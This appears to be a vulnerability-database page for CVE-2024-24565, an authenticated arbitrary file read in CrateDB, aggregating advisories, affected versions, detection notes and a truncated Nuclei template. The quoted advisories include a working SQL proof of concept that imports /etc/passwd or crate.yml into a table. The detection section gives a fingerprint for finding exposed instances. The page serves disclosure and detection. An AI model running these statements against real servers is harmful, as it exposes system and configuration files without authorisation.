CVE-2024-24565
published 2024-01-30CVE-2024-24565: CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the…
PriorityP347medium6.5CVSS 3.1
AVNACLPRLUINSUCHINAN
EXPLOIT
EPSS
3.08%
86.1th percentile
CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crate | crate | < 5.3.9 | 5.3.9 |
| crate | crate | — | — |
| crate | crate | — | — |
| crate | crate | — | — |
| cratedb | cratedb | < 5.3.9 | 5.3.9 |
| cratedb | cratedb | >= 5.4.0 < 5.4.8 | 5.4.8 |
| cratedb | cratedb | >= 5.5.0 < 5.5.4 | 5.5.4 |
| cratedb | cratedb | >= 5.6.0 < 5.6.1 | 5.6.1 |
Detection & IOCsextracted from sources · hover to see the quote
yara↗
regex('root:.*:0:0:', body_3)- →Detect exploitation attempts by monitoring POST requests to the CrateDB SQL endpoint '/_sql?types' containing the COPY FROM SQL statement referencing local filesystem paths (e.g., '/etc/passwd'). ↗
- →Successful exploitation is confirmed when the HTTP response body to a SELECT query against the created table matches the regex 'root:.*:0:0:', indicating /etc/passwd content was imported. ↗
- →A full exploit chain consists of three sequential POST requests to /_sql?types: (1) CREATE TABLE with a STRING column, (2) COPY FROM a local file path, (3) SELECT * to exfiltrate the file contents. Monitor for this pattern. ↗
- →FOFA/Shodan fingerprint for exposed CrateDB instances: search for title="CrateDB" to identify potentially vulnerable internet-facing nodes. ↗
- →Content-Type header 'application/json; charset=UTF-8' is used in all exploit requests to the CrateDB SQL API endpoint. ↗
- ·Exploitation requires authentication — the attacker must have valid credentials to the CrateDB instance before issuing COPY FROM SQL statements. ↗
- ·The vulnerability is patched in CrateDB versions 5.3.9, 5.4.8, 5.5.4, and 5.6.1. Detection rules should be scoped to instances running versions prior to these fixes. ↗
- ·The COPY FROM exploit uses the 'csv' format with 'header=false' option to bypass any header-row validation when importing arbitrary files. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
CrateDB database has an arbitrary file read vulnerability
ghsa·2024-01-30
CVE-2024-24565 [MEDIUM] CWE-22 CrateDB database has an arbitrary file read vulnerability
CrateDB database has an arbitrary file read vulnerability
### Summary
There is an arbitrary file read vulnerability in the CrateDB database, and authenticated CrateDB database users can read any file on the system.
### Details
There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
### PoC
```
CREATE TABLE info_leak(info_leak STRING);
COPY info_leak FROM '/etc/passwd' with (format='csv', header=false); or COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);
SELECT * FROM info_leak;
```
### Impact
This vulnerability affects all current
OSV
CrateDB database has an arbitrary file read vulnerability
osv·2024-01-30
CVE-2024-24565 [MEDIUM] CrateDB database has an arbitrary file read vulnerability
CrateDB database has an arbitrary file read vulnerability
### Summary
There is an arbitrary file read vulnerability in the CrateDB database, and authenticated CrateDB database users can read any file on the system.
### Details
There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
### PoC
```
CREATE TABLE info_leak(info_leak STRING);
COPY info_leak FROM '/etc/passwd' with (format='csv', header=false); or COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);
SELECT * FROM info_leak;
```
### Impact
This vulnerability affects all current
No detection rules found.
Nuclei
CrateDB Database - Arbitrary File Read
nuclei·CVSS 6.5
CVE-2024-24565 [MEDIUM] CrateDB Database - Arbitrary File Read
CrateDB Database - Arbitrary File Read
CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
Template:
id: CVE-2024-24565
info:
name: CrateDB Database - Arbitrary File Read
author: DhiyaneshDK
severity: medium
description: |
CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database table
2024-01-30
Published